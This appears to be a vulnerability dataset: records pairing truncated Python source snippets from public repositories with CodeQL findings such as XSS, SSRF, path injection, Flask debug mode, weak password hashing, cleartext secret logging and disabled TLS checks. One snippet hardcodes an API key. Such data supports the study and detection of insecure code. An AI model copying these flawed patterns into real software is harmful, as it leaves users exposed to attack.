2024-11-18T22:54:23.046400+00:00 | 1,597,543,712,000 | b21490a937a39f36cc1a5f7b826ad66f0e4b4810 | 3 | {
"blob_id": "b21490a937a39f36cc1a5f7b826ad66f0e4b4810",
"branch_name": "refs/heads/master",
"committer_date": 1597543712000,
"content_id": "ed765b4ce4aa56d61eef209b030265d4eded83b5",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "2a32c299f36f3ad2a93a07e15b77206c617db9e7",
"extension": "py"... | 2.921875 | stackv2 | import os
from jinja2 import Environment, FileSystemLoader
import pypandoc
import click
import pathlib
import re
BEFORE="""{% extends 'layouts/main.html' %}
{% block content %}
"""
AFTER="""
{% endblock %}
"""
def block(name, string):
return f"{{% block {name} %}}{string}{{% endblock {name} %}}"
def substituti... | 91 | 21.69 | 76 | 16 | 497 | python | [{"finding_id": "codeql_py/jinja2/autoescape-false_36602ab338ed7b0d_099baabd", "tool_name": "codeql", "rule_id": "py/jinja2/autoescape-false", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Using jinja2 templates with autoescape=False can potentially allow XSS attacks.", "remediati... | 1 | true | [
"CWE-079"
] | [
"py/jinja2/autoescape-false"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"Using jinja2 templates with autoescape=False can potentially allow XSS attacks."
] | [
57
] | [
58
] | [
18
] | [
47
] | |
2024-11-18T22:54:31.850716+00:00 | 1,609,009,657,000 | 01cccf806a13f595e836029b28ec4c166c88db06 | 4 | {
"blob_id": "01cccf806a13f595e836029b28ec4c166c88db06",
"branch_name": "refs/heads/master",
"committer_date": 1609009657000,
"content_id": "a23ee2147be24d5fcfda50bdebaf53f97a13b1d2",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "041130f42191f283c4eb783a2e489ebcc801b025",
"extension": "py"... | 3.734375 | stackv2 | import hmac
from random import SystemRandom
# Define global variables
_sys_rng = SystemRandom()
SALT_CHARS = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
DEFAULT_PBKDF2_ITERATIONS = 150000
def gen_salt(length):
"""Generate a random string of SALT_CHARS with specified ``length``."""
if len... | 59 | 32.83 | 79 | 10 | 471 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_4cd0f7d15cafe308_0390ca35", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.", ... | 2 | true | [
"CWE-312",
"CWE-327"
] | [
"py/clear-text-logging-sensitive-data",
"py/weak-sensitive-data-hashing"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"This expression logs [sensitive data (password)](1) as clear text.",
"[Sensitive data (password)](1) is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function.\n[Sensitive data (password)](2) is used in a hashing algorithm (SHA256) th... | [
58,
20
] | [
null,
null
] | [
11,
27
] | [
37,
35
] | |
2024-11-18T20:55:11.314404+00:00 | 1,464,145,619,000 | a9259cc83b6933069e54ce86a5a2bcfa66234a44 | 2 | {
"blob_id": "a9259cc83b6933069e54ce86a5a2bcfa66234a44",
"branch_name": "refs/heads/master",
"committer_date": 1464145619000,
"content_id": "2006fdb888a4491b8707257437bf1c4b47cdef31",
"detected_licenses": [
"MIT"
],
"directory_id": "743fe27396246f5889dbe2758318febf4c7529e3",
"extension": "py",
"fi... | 2.46875 | stackv2 | import os
import re
import base64
import zipfile
import tempfile
import requests
from lxml import html
from flask import Flask
from flask import abort
from flask import request
from flask import jsonify
from flask import send_file
ROOT_URL = '/banner-tool'
API_URL = ROOT_URL + '/api'
DOWNLOAD_URL = ROOT_URL + '/down... | 118 | 27.05 | 76 | 15 | 807 | python | [{"finding_id": "codeql_py/flask-debug_a6f6e105d6a838e0_7c55a32d", "tool_name": "codeql", "rule_id": "py/flask-debug", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "A Flask app appears to be run in debug mode. This may allow an attacker to run arbitrary code through the debugger.", ... | 4 | true | [
"CWE-215",
"CWE-022",
"CWE-022",
"CWE-022"
] | [
"py/flask-debug",
"py/path-injection",
"py/path-injection",
"py/path-injection"
] | [
"HIGH",
"HIGH",
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"A Flask app appears to be run in debug mode. This may allow an attacker to run arbitrary code through the debugger.",
"This path depends on a [user-provided value](1).",
"This path depends on a [user-provided value](1).",
"This path depends on a [user-provided value](1)."
] | [
117,
61,
76,
113
] | [
null,
null,
null,
null
] | [
5,
15,
25,
22
] | [
40,
23,
35,
26
] | |
2024-11-18T21:33:16.945515+00:00 | 1,611,194,562,000 | db8e5a876a21754746dbbe9da7e3b7900b88c15d | 3 | {
"blob_id": "db8e5a876a21754746dbbe9da7e3b7900b88c15d",
"branch_name": "refs/heads/main",
"committer_date": 1611194562000,
"content_id": "9f7779123a9dc916e3fd2358fb3f664e4122b4ad",
"detected_licenses": [
"MIT"
],
"directory_id": "c3fc25eaf78864e689e8643a8b32a0d4a82e76b6",
"extension": "py",
"file... | 2.65625 | stackv2 | # -*- coding: utf-8 -*-
"""User models."""
import datetime as dt
import hashlib
from flask_login import UserMixin
from tatoco.database import Column, PkModel, db, reference_col, relationship
from tatoco.extensions import bcrypt
class Role(PkModel):
"""A role for a user."""
__tablename__ = "roles"
name =... | 77 | 30.38 | 87 | 19 | 544 | python | [{"finding_id": "codeql_py/weak-sensitive-data-hashing_0e41287c62abe160_978ba91d", "tool_name": "codeql", "rule_id": "py/weak-sensitive-data-hashing", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Sensitive data (password)](1) is used in a hashing algorithm (MD5) that is insec... | 1 | true | [
"CWE-327"
] | [
"py/weak-sensitive-data-hashing"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"[Sensitive data (password)](1) is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function."
] | [
59
] | [
null
] | [
41
] | [
74
] | |
2024-11-18T21:33:22.980571+00:00 | 1,690,122,505,000 | 94a19bca5417c4a684e1c06a0d70d6264ff78e26 | 3 | {
"blob_id": "94a19bca5417c4a684e1c06a0d70d6264ff78e26",
"branch_name": "refs/heads/main",
"committer_date": 1690122505000,
"content_id": "c31bc7d21e326731dd5512f2f6364a4dc2e4e547",
"detected_licenses": [
"MIT"
],
"directory_id": "45cf8a6a92e9a3ae93f45428caa586cb1aa2f82a",
"extension": "py",
"file... | 2.625 | stackv2 | import collections.abc
import importlib
from pathlib import Path
from typing import Any, Dict, Mapping, NamedTuple, Optional, Type, Union, cast
import jinja2
import yaml
from .cookiecutter import CookieCutterContext, CookieCutterContextDict, ScaraplateConf
from .gitremotes import GitRemote
from .strategies import Str... | 120 | 34.27 | 88 | 15 | 990 | python | [{"finding_id": "codeql_py/jinja2/autoescape-false_b501a49d8f697623_553f8b45", "tool_name": "codeql", "rule_id": "py/jinja2/autoescape-false", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Using jinja2 templates with autoescape=False can potentially allow XSS attacks.", "remediati... | 1 | true | [
"CWE-079"
] | [
"py/jinja2/autoescape-false"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"Using jinja2 templates with autoescape=False can potentially allow XSS attacks."
] | [
13
] | [
null
] | [
7
] | [
59
] | |
2024-11-18T21:55:38.665902+00:00 | 1,630,238,467,000 | 8565c8a4a54f88328fc63674d34af101045e86b1 | 2 | {
"blob_id": "8565c8a4a54f88328fc63674d34af101045e86b1",
"branch_name": "refs/heads/main",
"committer_date": 1630238467000,
"content_id": "26ef74d370239ae412dccbca55823e788c273e3f",
"detected_licenses": [
"MIT"
],
"directory_id": "441a30c6e29b57bedabf9b53d8917538ed30adbe",
"extension": "py",
"file... | 2.390625 | stackv2 | from typing import Dict
import uuid
import time
from aiohttp import web
from JSONEncoder import JSONEncoder
class TaskController(web.View):
def __init__(self, request: web.Request) -> None:
super(TaskController, self).__init__(request)
self.db = self.request.db
self.tasks = self.db["TAS... | 133 | 31.6 | 102 | 19 | 898 | python | [{"finding_id": "codeql_py/stack-trace-exposure_be46f17d126f7482_65c5aa10", "tool_name": "codeql", "rule_id": "py/stack-trace-exposure", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Stack trace information](1) flows to this location and may be exposed to an external user.", "... | 4 | true | [
"CWE-209",
"CWE-209",
"CWE-209",
"CWE-209"
] | [
"py/stack-trace-exposure",
"py/stack-trace-exposure",
"py/stack-trace-exposure",
"py/stack-trace-exposure"
] | [
"HIGH",
"HIGH",
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"[Stack trace information](1) flows to this location and may be exposed to an external user.",
"[Stack trace information](1) flows to this location and may be exposed to an external user.",
"[Stack trace information](1) flows to this location and may be exposed to an external user.",
"[Stack trace information... | [
26,
37,
47,
71
] | [
null,
null,
null,
null
] | [
38,
42,
42,
38
] | [
52,
56,
56,
52
] | |
2024-11-18T21:55:47.821214+00:00 | 1,640,467,010,000 | 3c0e956476f55095b8c685e9835c00b464022516 | 3 | {
"blob_id": "3c0e956476f55095b8c685e9835c00b464022516",
"branch_name": "refs/heads/master",
"committer_date": 1640467010000,
"content_id": "fde236146da204ab3bbe4635d3b172d5c1f65ea2",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "9f7022f31780011e001b58acf15980fdba5f6184",
"extension": "py"... | 3.1875 | stackv2 | """
===============================================================================
Create a release of "python-ebay". Upload files and metadata to PyPi.
===============================================================================
This script can be used to automate the release of new versions of the
"python-ebay" ... | 149 | 34.22 | 79 | 16 | 1,146 | python | [{"finding_id": "codeql_py/clear-text-storage-sensitive-data_0532ecf0dc0fdb4e_64ec37fb", "tool_name": "codeql", "rule_id": "py/clear-text-storage-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression stores [sensitive data (password)](1) as clear text."... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-storage-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression stores [sensitive data (password)](1) as clear text."
] | [
101
] | [
null
] | [
27
] | [
38
] | |
2024-11-18T22:55:05.180915+00:00 | 1,586,060,939,000 | 33cdb897617ba0bcdcb92ffbc8558a2b335da2de | 3 | {
"blob_id": "33cdb897617ba0bcdcb92ffbc8558a2b335da2de",
"branch_name": "refs/heads/master",
"committer_date": 1586060939000,
"content_id": "d7577ec9c9256f07b1c276a048b8053d3f49d39a",
"detected_licenses": [
"BSD-3-Clause"
],
"directory_id": "4aa7263e19d032b0e402bdfff8884cf514f5bd52",
"extension": "p... | 2.671875 | stackv2 | # A simple Flask app for Reconciling names and subject headings from the Library of Congress (LoC) using OpenRefine
from flask import Flask, request, jsonify, json
from reconciliation import SearchLoC, Recon
app = Flask(__name__)
default_query = {
"id": "LoC",
"name": "LCNAF & LCSH",
"index": "/authorit... | 112 | 28.87 | 115 | 19 | 776 | python | [{"finding_id": "codeql_py/flask-debug_9033b6590b6d8e00_47290090", "tool_name": "codeql", "rule_id": "py/flask-debug", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "A Flask app appears to be run in debug mode. This may allow an attacker to run arbitrary code through the debugger.", ... | 2 | true | [
"CWE-215",
"CWE-079"
] | [
"py/flask-debug",
"py/reflective-xss"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"A Flask app appears to be run in debug mode. This may allow an attacker to run arbitrary code through the debugger.",
"Cross-site scripting vulnerability due to a [user-provided value](1)."
] | [
111,
78
] | [
null,
null
] | [
5,
38
] | [
24,
76
] | |
2024-11-18T22:55:05.446573+00:00 | 1,496,250,530,000 | bb05f71e43ed8a5291b70f408586b5b90923e559 | 3 | {
"blob_id": "bb05f71e43ed8a5291b70f408586b5b90923e559",
"branch_name": "refs/heads/master",
"committer_date": 1496250530000,
"content_id": "4817215943645ee09248342e169623293c2af1ca",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "223ac34a63904efc6599436c91d0a1f75a8d8be5",
"extension": "py"... | 2.78125 | stackv2 | """Runs simple login page. Requires root."""
from flask import Flask, render_template, request
# Run a very simple Flask server.
app = Flask(__name__)
logfile = "logs/currentlog.log"
# Include urls to use on the login template.
assets = dict()
assets["bootstrap"] = "https://maxcdn.bootstrapcdn.com/bootstrap/" + \
... | 35 | 30.51 | 76 | 15 | 273 | python | [{"finding_id": "codeql_py/clear-text-storage-sensitive-data_53a1d60706c5cfda_7d63e52a", "tool_name": "codeql", "rule_id": "py/clear-text-storage-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression stores [sensitive data (password)](1) as clear text."... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-storage-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression stores [sensitive data (password)](1) as clear text."
] | [
27
] | [
null
] | [
21
] | [
33
] | |
2024-11-18T22:55:09.236096+00:00 | 1,612,190,589,000 | c30aea7117ae631815b0f54119343f4191c1957a | 2 | {
"blob_id": "c30aea7117ae631815b0f54119343f4191c1957a",
"branch_name": "refs/heads/master",
"committer_date": 1612190589000,
"content_id": "8cd547ed24dfc46665b2b6848260fc45380cd132",
"detected_licenses": [
"MIT"
],
"directory_id": "d09dfb0b72bff7a2979b6ee6ff5484226ee1c695",
"extension": "py",
"fi... | 2.34375 | stackv2 | '''NeteaseCloudMusicApiPy
NeteaseCloudMusicApi 的 Python 绑定
https://github.com/NKID00/NeteaseCloudMusicApiPy
MIT License
Copyright (c) 2020 NKID00
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software ... | 242 | 34.21 | 78 | 21 | 2,268 | python | [{"finding_id": "codeql_py/weak-sensitive-data-hashing_df75c7f38334dd73_4b2d6495", "tool_name": "codeql", "rule_id": "py/weak-sensitive-data-hashing", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Sensitive data (password)](1) is used in a hashing algorithm (MD5) that is insec... | 2 | true | [
"CWE-327",
"CWE-327"
] | [
"py/weak-sensitive-data-hashing",
"py/weak-sensitive-data-hashing"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"[Sensitive data (password)](1) is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function.\n[Sensitive data (password)](2) is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensi... | [
120,
138
] | [
null,
null
] | [
22,
22
] | [
45,
45
] | |
2024-11-18T23:06:03.661798+00:00 | 1,686,823,611,000 | 734210a473044ea283af512b9e0fad5122c74ff2 | 3 | {
"blob_id": "734210a473044ea283af512b9e0fad5122c74ff2",
"branch_name": "refs/heads/master",
"committer_date": 1686823611000,
"content_id": "38f5ff8372f3ed7d5fba1bcceee94b575d254c55",
"detected_licenses": [
"MIT"
],
"directory_id": "9553c62ee80e1c2dc5842eb1e8f47b761d0590d1",
"extension": "py",
"fi... | 2.765625 | stackv2 | from azure.cognitiveservices.vision.computervision import ComputerVisionClient
from azure.cognitiveservices.vision.computervision.models import VisualFeatureTypes
from msrest.authentication import CognitiveServicesCredentials
import os
import sys
import json
from dotenv import load_dotenv
# Standard boilerplate for th... | 61 | 26.38 | 83 | 12 | 407 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_445a2a27436cb769_03ee87a3", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (private)](1) as clear text.", "... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (private)](1) as clear text."
] | [
55
] | [
null
] | [
9
] | [
39
] | |
2024-11-18T23:06:13.850207+00:00 | 1,626,140,889,000 | f9b84cb62e42de1f53db294ae4e6042820188bd5 | 4 | {
"blob_id": "f9b84cb62e42de1f53db294ae4e6042820188bd5",
"branch_name": "refs/heads/main",
"committer_date": 1626140889000,
"content_id": "8a339b9c877772701baa39105127d3060f8f2f35",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "55c2830faf938c0d6d2f9012a5b14a0a577c641d",
"extension": "py",
... | 4.09375 | stackv2 | class Employee:
# 'Common base class for all employees'
empCount = 0 # This is the static variable
def __init__(self, name, salary):
self.name = name # instance variable
self.salary = salary
self.id = Employee.empCount
Employee.empCount += 1
def displayCount(self):
... | 40 | 25.38 | 95 | 15 | 291 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_9e065607697aec23_fa302b79", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (private)](1) as clear text.\nTh... | 2 | true | [
"CWE-312",
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"This expression logs [sensitive data (private)](1) as clear text.\nThis expression logs [sensitive data (private)](2) as clear text.",
"This expression logs [sensitive data (private)](1) as clear text."
] | [
15,
35
] | [
null,
null
] | [
75,
11
] | [
86,
15
] | |
2024-11-18T23:06:24.052093+00:00 | 1,631,614,090,000 | 0a6d2b41af54939d6128160a2aa50232775b5ce2 | 2 | {
"blob_id": "0a6d2b41af54939d6128160a2aa50232775b5ce2",
"branch_name": "refs/heads/main",
"committer_date": 1631614090000,
"content_id": "453bf2afbffcd29afd42eaba3dc35a6da3b87aa0",
"detected_licenses": [
"MIT"
],
"directory_id": "71cb7f7cccae1da72bb7c0ee98db52dc4516f0b2",
"extension": "py",
"file... | 2.484375 | stackv2 | # ©sjd333
# https://discuss.streamlit.io/t/metrics-kpi-component/6991
# https://github.com/samdobson/streamlit-metrics
import streamlit as st
import streamlit.components.v1 as components
from jinja2 import Template
def _build_metric(label, value, value_2='', color_label='black', color_value='black', color_value_2='bl... | 71 | 31.34 | 167 | 13 | 600 | python | [{"finding_id": "codeql_py/jinja2/autoescape-false_1734b226fc17113e_7fd9cdde", "tool_name": "codeql", "rule_id": "py/jinja2/autoescape-false", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Using jinja2 templates with autoescape=False can potentially allow XSS attacks.", "remediati... | 1 | true | [
"CWE-079"
] | [
"py/jinja2/autoescape-false"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"Using jinja2 templates with autoescape=False can potentially allow XSS attacks."
] | [
49
] | [
null
] | [
12
] | [
31
] | |
2024-11-18T23:06:24.106520+00:00 | 1,569,279,314,000 | dd73c3b9a1f517a63d387420f981a1c1e640ef03 | 3 | {
"blob_id": "dd73c3b9a1f517a63d387420f981a1c1e640ef03",
"branch_name": "refs/heads/master",
"committer_date": 1569279314000,
"content_id": "0d02dda0458e816f88d6fd46623114d842049b02",
"detected_licenses": [
"MIT"
],
"directory_id": "b72238e9efe2c9971880ab3aea84202ce5e10ae8",
"extension": "py",
"fi... | 2.703125 | stackv2 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from operator import itemgetter, attrgetter, methodcaller
import csv
import os
import re
genders = dict(men=0, woman=0)
womens = ["WOMAN", 'GIRL', "PIZZA GIRLS FEAR",'COOL GIRLS ANGER','MOMS DISGUST','COOL GIRLS FEAR'
,'TEACHERS FEAR','RILEY','MEG','MOMS FEAR'
... | 43 | 33.42 | 136 | 16 | 431 | python | [{"finding_id": "codeql_py/clear-text-storage-sensitive-data_7226e6f61404dac4_645c18ab", "tool_name": "codeql", "rule_id": "py/clear-text-storage-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression stores [sensitive data (private)](1) as clear text.",... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-storage-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression stores [sensitive data (private)](1) as clear text."
] | [
40
] | [
null
] | [
22
] | [
50
] | |
2024-11-18T20:56:52.756910+00:00 | 1,595,601,507,000 | 3262ccc601bdad48ca31f709a40c2ae46a2507e1 | 3 | {
"blob_id": "3262ccc601bdad48ca31f709a40c2ae46a2507e1",
"branch_name": "refs/heads/master",
"committer_date": 1595601507000,
"content_id": "fccc49717ace70d80059a600aa3f52a20abb033e",
"detected_licenses": [
"MIT"
],
"directory_id": "a94111c7511e28bcd2ff5ecd10b6871bfbc7a1e7",
"extension": "py",
"fi... | 2.53125 | stackv2 | #!/usr/bin/env python3
import requests
import re
import json
import arrow
import logging
from bs4 import BeautifulSoup
import datetime as dt
from .lib import zonekey
SEARCH_DATA = re.compile(r'var gunlukUretimEgrisiData = (?P<data>.*);')
TIMEZONE = 'Europe/Istanbul'
URL = 'https://ytbsbilgi.teias.gov.tr/ytbsbilgi/frm... | 180 | 31.63 | 105 | 22 | 1,513 | python | [{"finding_id": "codeql_py/request-without-cert-validation_9572d8d562aaf7cc_952d6b82", "tool_name": "codeql", "rule_id": "py/request-without-cert-validation", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "This request may run without certificate validation because [it is disabled]... | 1 | true | [
"CWE-295"
] | [
"py/request-without-cert-validation"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"This request may run without certificate validation because [it is disabled](1)."
] | [
136
] | [
null
] | [
16
] | [
40
] | |
2024-11-18T20:56:59.752663+00:00 | 1,626,825,546,000 | e0932ee90421fd6d8c63c18c64cfc61e0f5fddb9 | 3 | {
"blob_id": "e0932ee90421fd6d8c63c18c64cfc61e0f5fddb9",
"branch_name": "refs/heads/master",
"committer_date": 1626825546000,
"content_id": "f757bbb502ffc7db2356876cfe47bc8a8d90c0dc",
"detected_licenses": [
"MIT"
],
"directory_id": "15e0192220c37e8d85190af9da00e0070131cfdc",
"extension": "py",
"fi... | 3.109375 | stackv2 | """
Let's start by building a form to submit new images.
"""
from urllib import request
from django.core.files.base import ContentFile
from django.utils.text import slugify
from django import forms
from .models import Image
class ImageCreateForm(forms.ModelForm):
"""
This form is a ModelFOrm form built from ... | 61 | 39.72 | 82 | 14 | 515 | python | [{"finding_id": "codeql_py/full-ssrf_8000105f3b40526d_28513e0a", "tool_name": "codeql", "rule_id": "py/full-ssrf", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "The full URL of this request depends on a [user-provided value](1).", "remediation": "", "location": {"file_path": "u... | 1 | true | [
"CWE-918"
] | [
"py/full-ssrf"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"The full URL of this request depends on a [user-provided value](1)."
] | [
56
] | [
null
] | [
20
] | [
46
] | |
2024-11-18T22:43:31.194652+00:00 | 1,608,326,728,000 | 0112543eaac9c9f158bd4f8bb762b876089538c5 | 3 | {
"blob_id": "0112543eaac9c9f158bd4f8bb762b876089538c5",
"branch_name": "refs/heads/main",
"committer_date": 1608326728000,
"content_id": "56ab595d09a9ffc71933e26b7f3e22c929ce5c1a",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "2222250aca7234614038276a851eb929a0f3c5bf",
"extension": "py",
... | 2.53125 | stackv2 | #!/usr/bin/python3
import itertools
from flask import Blueprint, make_response
from modules.database import get_db_conn
from server_error import server_error
route_lessons = Blueprint('route_lessons', __name__)
# --------------------------
# Return lessons list
# --------------------------
@route_lessons.route('/l... | 93 | 45.95 | 118 | 19 | 948 | python | [{"finding_id": "codeql_py/reflective-xss_94cee6839d4fb71a_4b30c0c7", "tool_name": "codeql", "rule_id": "py/reflective-xss", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "Cross-site scripting vulnerability due to a [user-provided value](1).", "remediation": "", "location": {"fi... | 2 | true | [
"CWE-079",
"CWE-079"
] | [
"py/reflective-xss",
"py/reflective-xss"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"Cross-site scripting vulnerability due to a [user-provided value](1).",
"Cross-site scripting vulnerability due to a [user-provided value](1)."
] | [
56,
92
] | [
null,
null
] | [
26,
30
] | [
58,
104
] | |
2024-11-18T22:44:03.025619+00:00 | 1,615,005,781,000 | 7de9e23fb558efcfb59c09e5cf3cfebe042559af | 3 | {
"blob_id": "7de9e23fb558efcfb59c09e5cf3cfebe042559af",
"branch_name": "refs/heads/master",
"committer_date": 1615005781000,
"content_id": "0a7cd2bd04140d618e42795167001568fa81e52a",
"detected_licenses": [
"MIT"
],
"directory_id": "dba8dd37434af4591f4efe1cf8aaffa41a51efef",
"extension": "py",
"fi... | 2.5625 | stackv2 | import jieba,requests,re
from pprint import pprint
from flask import Flask
from flask import request
from urllib.parse import quote
from flask_cors import CORS
app=Flask(__name__)
CORS(app)
@app.route('/',methods=['GET'])
def init():
return 'init'
@app.route('/testpost',methods=['POST'])
def testpost():
return '... | 124 | 20.91 | 112 | 20 | 886 | python | [{"finding_id": "codeql_py/flask-debug_7f45dc4b1a9ce24c_de070f4e", "tool_name": "codeql", "rule_id": "py/flask-debug", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "A Flask app appears to be run in debug mode. This may allow an attacker to run arbitrary code through the debugger.", ... | 2 | true | [
"CWE-215",
"CWE-918"
] | [
"py/flask-debug",
"py/partial-ssrf"
] | [
"HIGH",
"MEDIUM"
] | [
"MEDIUM",
"MEDIUM"
] | [
"A Flask app appears to be run in debug mode. This may allow an attacker to run arbitrary code through the debugger.",
"Part of the URL of this request depends on a [user-provided value](1)."
] | [
124,
115
] | [
null,
118
] | [
2,
4
] | [
57,
5
] | |
2024-11-18T22:29:52.558895+00:00 | 1,565,352,330,000 | c32b16a8dac8cbbdafd34adc90cadad359364b19 | 3 | {
"blob_id": "c32b16a8dac8cbbdafd34adc90cadad359364b19",
"branch_name": "refs/heads/master",
"committer_date": 1565352330000,
"content_id": "d567080052eb6f734727ced8f96388331a50096b",
"detected_licenses": [
"MIT"
],
"directory_id": "5c779c17e09a2e411fadedb0b7d1f7664a57de5e",
"extension": "py",
"fi... | 2.609375 | stackv2 | # Import all the required libraries
from flask import Flask, request, jsonify, render_template
import os
import dialogflow
import requests
import json
import pusher
# initialize Pusher
pusher_client = pusher.Pusher(
app_id=os.getenv('PUSHER_APP_ID'),
key=os.getenv('PUSHER_KEY'),
secret=os.geten... | 77 | 29.69 | 113 | 13 | 511 | python | [{"finding_id": "codeql_py/flask-debug_4ac367dd5df6204e_e67704c0", "tool_name": "codeql", "rule_id": "py/flask-debug", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "A Flask app appears to be run in debug mode. This may allow an attacker to run arbitrary code through the debugger.", ... | 2 | true | [
"CWE-215",
"CWE-918"
] | [
"py/flask-debug",
"py/partial-ssrf"
] | [
"HIGH",
"MEDIUM"
] | [
"MEDIUM",
"MEDIUM"
] | [
"A Flask app appears to be run in debug mode. This may allow an attacker to run arbitrary code through the debugger.",
"Part of the URL of this request depends on a [user-provided value](1)."
] | [
77,
32
] | [
null,
33
] | [
5,
20
] | [
24,
75
] | |
2024-11-18T22:30:04.060563+00:00 | 1,614,129,961,000 | c191ae69bbfee497a377dc7133a57d365284bf6e | 3 | {
"blob_id": "c191ae69bbfee497a377dc7133a57d365284bf6e",
"branch_name": "refs/heads/main",
"committer_date": 1614129961000,
"content_id": "75a52ac2094974781cfe3158e1309b51997a856d",
"detected_licenses": [
"MIT"
],
"directory_id": "1d89bc8c36e515570975bc187d18497d83f17174",
"extension": "py",
"file... | 2.515625 | stackv2 | import json
import requests
key = "eQ3hlNegA9SGXgOfeSY2ixTZAkYPivdZ"
host = "http://localhost:8000"
interview = "docassemble.imlswirelessinterview:data/questions/wireless.yml"
# first, retrieve a new session
resp = requests.get(f"{host}/api/session/new",
{"key": key, "i": interview})
values = resp... | 48 | 31.4 | 94 | 11 | 390 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_6e372b793fe9cad4_ba94a8e1", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (secret)](1) as clear text.", "r... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (secret)](1) as clear text."
] | [
20
] | [
null
] | [
7
] | [
29
] | |
2024-11-18T23:10:11.565618+00:00 | 1,531,155,867,000 | 84c32dc9d0f862aec71eb6246b193678e4eba22d | 3 | {
"blob_id": "84c32dc9d0f862aec71eb6246b193678e4eba22d",
"branch_name": "refs/heads/master",
"committer_date": 1531155867000,
"content_id": "36bba05df3bef27ca407d3171b67819ac65df7f6",
"detected_licenses": [
"MIT"
],
"directory_id": "6b7120192a0f5e141c92db8655b67fa8657b5d17",
"extension": "py",
"fi... | 2.734375 | stackv2 | # -*- coding: utf-8 -*-
# pay attention to run python 3!
from urllib.request import urlopen
from time import time
from collections import deque
import re
import os
import sys
import io
import ssl
import traceback
import argparse
# ~~~~~~~~~~~~~~~~~~ encoding stuff ~~~~~~~~~~~~~~~
# DOESN'T NEEDED: run in console: ... | 224 | 36.18 | 140 | 16 | 2,062 | python | [{"finding_id": "codeql_py/insecure-protocol_6f643cf6812c8b51_aa083099", "tool_name": "codeql", "rule_id": "py/insecure-protocol", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "Insecure SSL/TLS protocol version TLSv1 specified by [call to ssl.SSLContext](1).", "remediation": "", "lo... | 1 | true | [
"CWE-327"
] | [
"py/insecure-protocol"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"Insecure SSL/TLS protocol version TLSv1 specified by [call to ssl.SSLContext](1)."
] | [
101
] | [
null
] | [
16
